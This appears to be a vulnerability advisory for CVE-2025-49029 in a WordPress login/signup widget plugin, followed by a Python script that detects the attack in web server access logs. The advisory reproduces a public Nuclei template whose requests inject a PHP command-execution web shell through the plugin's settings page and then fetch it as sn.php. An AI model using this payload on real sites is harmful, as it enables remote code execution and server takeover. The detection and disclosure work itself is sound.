CVE-2025-49029: WordPress Custom Login And Signup Widget Plugin <= 1.0 - Arbitrary Code Execution

Date: 2025-08-01 | Affected software: WordPress Custom Login And Signup Widget Plugin | PoC: public

Vulnerability description

Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.Kazi Custom Login And Signup Widget allows Code Injection. This issue affects Custom Login And Signup Widget: from n/a through 1.0

PoC code [public]

id: CVE-2025-49029

info:
  name: WordPress Custom Login And Signup Widget Plugin <= 1.0 - Arbitrary Code Execution
  author: pussycat0x
  severity: high
  description: |
    Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.Kazi Custom Login And Signup Widget allows Code Injection.This issue affects Custom Login And Signup Widget: from n/a through 1.0
  reference:
    - https://github.com/Nxploited/CVE-2025-49029
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-login-and-signup-widget/custom-login-and-signup-widget-10-authenticated-administrator-remote-code-execution
  classification:
    epss-score: 0.00268
    epss-percentile: 0.50173
  metadata:
    verified: true
    max-request: 3
    publicwww-query: "/wp-content/plugins/custom-login-and-signup-widget/"
    fofa-query: body="/wp-content/plugins/custom-login-and-signup-widget/"
  tags: cve,cve2025,wordpress,intrusive,plugin,wordpress-custom-login,file-upload

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        POST /wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes HTTP/1.1
        Host: {{Hostname}}
        Referer: {{RootURL}}/wp-admin/options-general.php?page=custom-login-and-signup-widget
        Content-Type: application/x-www-form-urlencoded
        Origin: {{RootURL}}

        text=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit

      - |
        GET /wp-content/plugins/custom-login-and-signup-widget/content/sn.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains(body_2, "custom-login-and-signup-widget")
          - status_code_3 == 500
        condition: and
# digest: 490a0046304402206919f31c78e11bf0d69283ba6f91935018d94ad73a4fb31888af83822315492302204202b97520465879d0295d95ee6e69f211c8664d92d0600f6ad85d6d5abd87dd:922c64590222798bb761d5b6d8e72950
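The template above shows the request sequence a defender can look for in web server access logs: an authenticated POST to the plugin's settings page with `page=custom-login-and-signup-widget&editbn1=yes`, followed shortly afterwards by a request for `/wp-content/plugins/custom-login-and-signup-widget/content/sn.php` from the same source. The following Python script is an added detection example, not part of the PoC or of the plugin; it correlates these two events over Apache/nginx combined-format log lines. The log lines are constructed sample data, the 10-minute correlation window is an arbitrary choice, and the assumption that the submitted text ends up in `content/sn.php` is taken from the template's third request rather than from the plugin's source.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Paths and parameters taken from the PoC template on this page.
SETTINGS_PAGE = "/wp-admin/options-general.php"
PLUGIN_SLUG = "custom-login-and-signup-widget"
# Assumption (from the template's third request): submitted text is written here.
WRITTEN_FILE = f"/wp-content/plugins/{PLUGIN_SLUG}/content/sn.php"

# Combined log format: ip ident user [timestamp] "METHOD target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], TS_FMT)
    parts = urlsplit(ev["target"])
    ev["path"] = parts.path
    ev["query"] = parse_qs(parts.query)   # values are lists, e.g. {"page": ["..."]}
    ev["status"] = int(ev["status"])
    return ev


def is_settings_write(ev):
    """POST to the plugin settings page with editbn1=yes (the write in request 2)."""
    return (ev["method"] == "POST" and ev["path"] == SETTINGS_PAGE
            and ev["query"].get("page") == [PLUGIN_SLUG]
            and ev["query"].get("editbn1") == ["yes"])


def is_written_file_hit(ev):
    """Any request for the file the template fetches in request 3."""
    return ev["path"] == WRITTEN_FILE


def correlate(lines, window=timedelta(minutes=10)):
    """Return (severity, source_ip, detail) findings.

    A settings write alone is informational: administrators change these
    options legitimately. A request for content/sn.php is medium, and high
    when the same source performed a settings write within the window.
    """
    events = [e for e in (parse_line(l) for l in lines) if e]
    writes = {}        # source ip -> timestamps of settings writes
    findings = []
    for ev in events:
        if is_settings_write(ev):
            writes.setdefault(ev["ip"], []).append(ev["ts"])
            findings.append(("info", ev["ip"],
                             "plugin settings write (legitimate admin change or injection attempt)"))
        elif is_written_file_hit(ev):
            recent = [t for t in writes.get(ev["ip"], []) if timedelta(0) <= ev["ts"] - t <= window]
            detail = "request for content/sn.php"
            if ev["query"]:
                detail += " with query string"
            if recent:
                detail += " shortly after settings write from same source"
            findings.append(("high" if recent else "medium", ev["ip"], detail))
    return findings


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Aug/2025:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
    '203.0.113.7 - - [01/Aug/2025:10:00:03 +0000] "POST /wp-admin/options-general.php'
    '?page=custom-login-and-signup-widget&editbn1=yes HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Aug/2025:10:00:05 +0000] "GET /wp-content/plugins/'
    'custom-login-and-signup-widget/content/sn.php?cmd=id HTTP/1.1" 200 40',
    '198.51.100.2 - - [01/Aug/2025:11:30:00 +0000] "GET /wp-content/plugins/'
    'custom-login-and-signup-widget/content/sn.php HTTP/1.1" 200 0',
    '192.0.2.9 - - [01/Aug/2025:12:00:00 +0000] "GET /index.php HTTP/1.1" 200 1000',
]

if __name__ == "__main__":
    for severity, ip, detail in correlate(SAMPLE_LOG):
        print(f"[{severity}] {ip}: {detail}")
```

Run against real logs by replacing `SAMPLE_LOG` with the file's lines; the access log does not carry the POST body, so the PHP payload itself is not visible here, which is why the correlation with the later `sn.php` request is what raises the severity. Since the write requires an administrator session, a high finding also means the admin account used should be reviewed.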